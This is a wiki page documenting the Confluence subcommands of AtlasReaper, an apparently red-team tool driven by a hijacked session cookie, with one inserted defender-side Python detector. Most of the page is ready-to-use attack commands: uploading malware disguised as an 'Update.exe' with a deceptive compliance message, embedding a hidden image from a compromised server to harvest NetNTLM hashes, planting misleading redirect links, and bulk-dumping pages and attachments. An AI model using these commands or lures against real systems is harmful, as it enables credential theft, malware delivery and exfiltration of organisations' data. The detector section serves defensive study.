
Confluence

werdhaihai edited this page Jul 15, 2023 · 10 revisions

Confluence Subcommands

The confluence command contains several subcommands.

PS C:\> .\AtlasReaper.exe confluence --help

                                                   .@@@@
                                               @@@@@
                                            @@@@@   @@@@@@@
                                          @@@@@   @@@@@@@@@@@
                                         @@@@@  @@@@@@@@@@@@@@@
                                        @@@@,  @@@@        *@@@@
                                          @@@@ @@@  @@  @@@ .@@@
   _  _   _         ___                       @@@@@@@     @@@@@@
  /_\| |_| |__ _ __| _ \___ __ _ _ __  ___ _ _   @@   @@@@@@@@
 / _ \  _| / _` (_-<   / -_) _` | '_ \/ -_) '_|  @@   @@@@@@@@
/_/ \_\__|_\__,_/__/_|_\___\__,_| .__/\___|_|    @@@@@@@@   &@
                                |_|             @@@@@@@@@@  @@&
                                                @@@@@@@@@@@@@@@@@
                                               @@@@@@@@@@@@@@@@. @@
                                                  @werdhaihai
AtlasReaper 1.0.0.0

  attach             Attach a file to a page

  download           Download Attachment

  embed              Embed a 1x1 pixel image to perform farming attacks

  link               Add link to page

  listattachments    List Attachments

  listpages          List pages

  listspaces         List spaces

  search             Search Confluence

  help               Display more information on a specific command.

  version            Display version information.

Attach

The attach subcommand can be used to attach files to pages, and optionally provide a message for additional context.

Help

PS C:\> .\AtlasReaper.exe confluence attach --help

AtlasReaper 1.0.0.0

  -a, --attachment    Attachment Id to attach to page (if attachment is already created)

  --at                User id to @ on the page (get user id from the jira listusers command)

  --comment           (Default: untitled) Comment for uploaded file

  -f, --file          File to attach

  -n, --name          Name of file attachment. (Defaults to filename passed with -f/--file

  -p, --page          Required. Page to attach

  -t, --text          Text to add to page to provide context (e.g "I uploaded this file, please take a look")

  -u, --url           Required. Confluence URL

  -c, --cookie        cloud.session.token

  -o, --output        Save output to file

  --help              Display this help screen.

  --version           Display version information.

Example

This example attaches C:\Windows\Tasks\Malware.exe to the page 57657264 and names the file Update.exe. It also @/mentions the user with the Id 8930955 and adds text (-t/--text) to provide context for the attachment.

PS C:\> .\AtlasReaper.exe confluence attach `
    -f "C:\Windows\Tasks\Malware.exe" `
    -n Update.exe `
    -p 57657264 `
    --at 8930955 `
    -t "I'm attaching the updater we need to run on each system to bring all systems in the environment into compliance." `
    -u $URL `
    -c $COOKIE

Embed

The embed subcommand is used to trigger NetNTLMv1/v2 authentication by embedding a 1x1 pixel image hosted on an attacker-controlled server running a tool such as Responder or SharpWebServer.

Help

PS C:\> .\AtlasReaper.exe confluence embed --help

AtlasReaper 1.0.0.0

  --at             User id to @ on the page (get user id from the jira listusers command)

  -l, --link       Required. Url to listener

  -m, --message    Messgage to add to the page (i.e. I need you to take a look at this)

  -p, --page       Required. Page to embed

  -u, --url        Required. Confluence URL

  -c, --cookie     cloud.session.token

  -o, --output     Save output to file

  --help           Display this help screen.

  --version        Display version information.

Example

This example uses the embed subcommand to embed a 1x1 pixel image on the 57657264 page. In this example, a compromised server, http://jenkins.stricklandpropane.corp, is running a tool for negotiating NetNTLMv1/v2 authentication. When users browse to the Confluence page, their browser will attempt to load the image, and if Integrated Windows Authentication is enabled, the browser will automatically send the hash. It is possible to @/mention users and include a message.

PS C:\> .\AtlasReaper.exe confluence embed `
	-p 57657264 `
	-l "http://jenkins.stricklandpropane.corp/logo.jpeg" `
	--at 8930955 `
	-m "Is this page out of date?" `
	-u $URL `
	-c $COOKIE

Link

The link subcommand can be used to create a link on pages. The link text can be set to display a site that differs from the actual href, to convince a user to go to a site they did not intend to visit. Optionally, you can @/mention users and include a message for context.

NOTE: If the link text looks like a url (e.g. it starts with http:// or https://), Confluence will display a warning to the user that they are actually going to a different site. This may be possible to bypass.

Help

PS C:\> .\AtlasReaper.exe confluence link --help

AtlasReaper 1.0.0.0

  --at             User id to @ on the page (get user id from the jira listusers command)

  -l, --link       Required. Url to link to

  -m, --message    Messgage to add to the page (i.e. I need you to take a look at this)

  -p, --page       Required. Page to embed

  -t, --text       (Default: Here) Link text to display

  -u, --url        Required. Confluence URL

  -c, --cookie     cloud.session.token

  -o, --output     Save output to file

  --help           Display this help screen.

  --version        Display version information.

Example

In this example, a link is added to the page 57657264. The link text, which the user will see, is https://stricklandpropane.corp, but they will actually be sent to http://jenkins.stricklandpropane.corp/?redir=https://stricklandpropane.corp.

The Jenkins server in this example has been compromised and is running SharpWebServer with the redir option. Using this option will first negotiate NetNTLMv1/v2 authentication, then redirect the user to the site specified in the redir URL parameter (https://stricklandpropane.corp).

Additionally, a user with the Id 8930955 is mentioned and a message is used with the -m flag.

PS C:\> .\AtlasReaper.exe confluence link `
	-p 57657264 `
	-l http://jenkins.stricklandpropane.corp/?redir=https://stricklandpropane.corp `
	-t https://stricklandpropane.corp `
	--at 8930955 `
	-m "Is this the correct link for here?" `
	-u $URL `
	-c $COOKIE
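
A defender-side check for the embed and link techniques described above, added here as an example and not part of AtlasReaper or its wiki: it scans a page body for remotely hosted images (1x1 ones are flagged as hidden) and for links whose URL-looking text names a different host than the href. It assumes the body is in Confluence storage format (`ac:image` wrapping `ri:url`); `TRUSTED_IMAGE_HOSTS`, `PageAuditor`, `audit` and the sample body are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

TRUSTED_IMAGE_HOSTS = {"confluence.example.com"}  # assumption: placeholder allowlist

class PageAuditor(HTMLParser):  # collects (kind, url) findings from one page body
    def __init__(self):
        super().__init__()
        self.findings, self._img, self._href, self._text = [], None, None, []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "ac:image":  # image wrapper carrying the display size
            self._img = a
        elif tag == "ri:url" and self._img is not None:
            self._image(a.get("ri:value"), self._img.get("ac:width"), self._img.get("ac:height"))
        elif tag == "a":
            self._href, self._text = a.get("href") or "", []

    def handle_endtag(self, tag):
        if tag == "ac:image":
            self._img = None
        elif tag == "a" and self._href is not None:
            text = "".join(self._text).strip()
            # Only URL-looking link text can be compared with the real target.
            if (text.lower().startswith(("http://", "https://"))
                    and urlsplit(text).hostname != urlsplit(self._href).hostname):
                self.findings.append(("link-text-mismatch", self._href))
            self._href = None

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def _image(self, src, width, height):
        host = urlsplit(src or "").hostname
        if host and host not in TRUSTED_IMAGE_HOSTS:
            kind = "hidden-remote-image" if (width, height) == ("1", "1") else "remote-image"
            self.findings.append((kind, src))

def audit(body):
    parser = PageAuditor()
    parser.feed(body)
    parser.close()
    return parser.findings

SAMPLE_BODY = (  # constructed; reuses the hosts from this page's examples
    '<ac:image ac:height="1" ac:width="1"><ri:url ri:value="http://jenkins.stricklandpropane.corp/logo.jpeg"/></ac:image>'
    '<a href="http://jenkins.stricklandpropane.corp/?redir=https://stricklandpropane.corp">https://stricklandpropane.corp</a>')
```

Calling `audit(SAMPLE_BODY)` returns one finding per technique; images served from an allowlisted host and links with non-URL text such as "Here" produce none.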

ListAttachments

The listattachments subcommand can be used to list attachments with several options for filtering. Using the --all-spaces flag can generate a lot of requests. The -i/--include and -x/--exclude flags allow including or excluding files based on file extension. For multiple extensions, a comma-separated list can be used.

Help

PS C:\> .\AtlasReaper.exe confluence listattachments --help

AtlasReaper 1.0.0.0

  -a, --all        (Default: false) Return all attachments for supplied space

  --all-spaces     (Default: false) Return attachments for all spaces. WARNING!! This can make a lot of requests!

  -i, --include    Comma-separated list of extensions to include (e.g. png,jpeg)

  -l, --limit      (Default: 200) Number or attachments to return

  -p, --page       Page to return attachments for

  -s, --space      Space to return attachments for

  -x, --exclude    Comma-separated list of extensions to exclude (e.g. png,jpeg)

  -u, --url        Required. Confluence URL

  -c, --cookie     cloud.session.token

  -o, --output     Save output to file

  --help           Display this help screen.

  --version        Display version information.

Example

This example lists every attachment, excluding files with the png extension, for all spaces in the tenant and outputs the results to a file, C:\Windows\Tasks\attachments.txt.

PS C:\> .\AtlasReaper.exe confluence listattachments `
	--all-spaces `
	-x png `
	-o "C:\Windows\Tasks\attachments.txt" `
	-u $URL `
	-c $COOKIE

ListPages

To return pages from a given space or all spaces, use the listpages subcommand. The -b/--body switch will return a "readable" format of the page's contents. The --all option can be used to dump all pages.

NOTE: The --all option will potentially need to make a lot of web requests as it tries to retrieve all of the pages. This can result in a large amount of data being returned, especially if used without -s/--space or with -b/--body.

Help

PS C:\> .\AtlasReaper.exe confluence listpages --help

AtlasReaper 1.0.0.0

  --all           (Default: false) Return all pages (Returns every Page if no Space is specified)

  -b, --body      (Default: false) Print body of pages

  -l, --limit     (Default: 250) Number of results to return

  -p, --page      Page to return

  -s, --space     Space to search

  --status        Page Status (current, archived, deleted, trashed) Defaults to all

  -u, --url       Required. Confluence URL

  -c, --cookie    cloud.session.token

  -o, --output    Save output to file

  --help          Display this help screen.

  --version       Display version information.

Example

Returning all pages for a specific space.

PS C:\> .\AtlasReaper.exe confluence listpages -u $URL -c $COOKIE -s 2403816 --all

Authenticated as: Hank Hill
Page Title: IT
Updated   : 2023-06-21T00:01:38.450Z
Page Id   : 57657261

Page Title: Get the most out of your team space
Updated   : 2023-06-21T00:01:38.365Z
Page Id   : 57657262

Page Title: IT change management
Updated   : 2023-06-21T00:01:38.266Z
Page Id   : 57657264

Page Title: IT project poster
Updated   : 2023-06-21T00:01:38.175Z
Page Id   : 57657271

Returning a specific page and its body.

PS C:\> .\AtlasReaper.exe confluence listpages -u $URL -c $COOKIE -p 3408072 --body

Authenticated as: Hank Hill
Page Title: IT
Updated   : 2023-06-21T00:01:38.450Z
Page Id   : 3408072
Page Body :
                Welcome to your IT team space!
                You're in the space
                overview
                . It's what visitors first see, like a landing page for your space
                Click ?? Edit to customize your overview
                A space contains
                pages

ListSpaces

The listspaces subcommand will list the spaces in Confluence. It has a few options, including one to filter the type of space returned. By default, a personal space is created for all new users.

Help

PS C:\> .\AtlasReaper.exe confluence listspaces --help

AtlasReaper 1.0.0.0

  --all           (Default: false) Returns all spaces

  -l, --limit     (Default: 100) Number of results to return

  -s, --space     Space to search

  -t, --type      Space type to return (global, personal, ...?)

  -u, --url       Required. Confluence URL

  -c, --cookie    cloud.session.token

  -o, --output    Save output to file

  --help          Display this help screen.

  --version       Display version information.

Example

PS C:\> .\AtlasReaper.exe confluence listspaces -u $URL -c $COOKIE

Authenticated as: Hank Hill
    Space Name  : IT
    Space Id    : 2403816
    Space Key   : IT
    Space Type  : global
    Space Status: current

    Space Name  : FINANCE
    Space Id    : 2664114
    Space Key   : FINANCE
    Space Type  : global
    Space Status: current

    Space Name  : HR
    Space Id    : 3604801
    Space Key   : HR
    Space Type  : global
    Space Status: current

    Space Name  : DEV
    Space Id    : 8091384
    Space Key   : DEV
    Space Type  : global
    Space Status: current

    Space Name  : Hank Hill
    Space Id    : 98306
    Space Key   : ~897452e18ead890e8a
    Space Type  : personal
    Space Status: current

Search

Help

PS C:\> .\AtlasReaper.exe confluence search --help

AtlasReaper 1.0.0.0

  -a, --all       (Default: false) Return all matches

  -l, --limit     (Default: 250) Number of results to return

  -q, --query     Required. String or phrase to query

  -u, --url       Required. Confluence URL

  -c, --cookie    cloud.session.token

  -o, --output    Save output to file

  --help          Display this help screen.

  --version       Display version information.

Example
